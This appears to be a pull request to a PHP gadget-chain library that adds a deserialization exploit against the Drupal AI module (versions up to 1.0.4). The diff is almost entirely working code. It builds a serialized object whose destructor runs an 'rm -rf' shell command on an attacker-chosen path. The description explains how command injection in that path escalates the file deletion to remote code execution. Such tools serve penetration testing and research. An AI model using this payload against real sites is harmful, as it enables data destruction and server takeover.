### PR TITLE
Drupal/FD2 for the AI module

### DIFF
--- a/gadgetchains/Drupal/FD/2/chain.php
+++ b/gadgetchains/Drupal/FD/2/chain.php
@@ -1,0 +1,23 @@
+<?php
+
+namespace GadgetChain\Drupal;
+
+class FD2 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = 'Drupal AI module <= 1.0.4';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+    public static $information = '
+        This specifically requires the AI Automators submodule to be enabled.
+        Can also achieve RCE via command injection in the filename, but the path
+        must pass a check with file_exists(). This could be used in combination
+        with a File Write gadget chain to achieve RCE (useful if that FW gadget
+        cannot write to a file directly executable via the webserver). The
+        vulnerable destructor does this: exec(\'rm -rf \' . $this->tmpDir);
+    ';
+
+    public function generate(array $parameters)
+    {
+        return new \Drupal\ai_automators\PluginBaseClasses\VideoToText($parameters['remote_path']);
+    }
+}

--- a/gadgetchains/Drupal/FD/2/gadgets.php
+++ b/gadgetchains/Drupal/FD/2/gadgets.php
@@ -1,0 +1,13 @@
+<?php
+
+namespace Drupal\ai_automators\PluginBaseClasses {
+    class VideoToText
+    {
+        public string $tmpDir;
+
+        public function __construct($tmpDir)
+        {
+            $this->tmpDir = $tmpDir;
+        }
+    }
+}


### PR DESCRIPTION
This is an FD gadget in the AI module.

Unusually it can be escalated to RCE if you get a command injection payload into a path that passes a `file_exists()` check in the destructor.

As this is in a module (included in Drupal CMS but not Drupal core), you could put it into a different namespace / directory.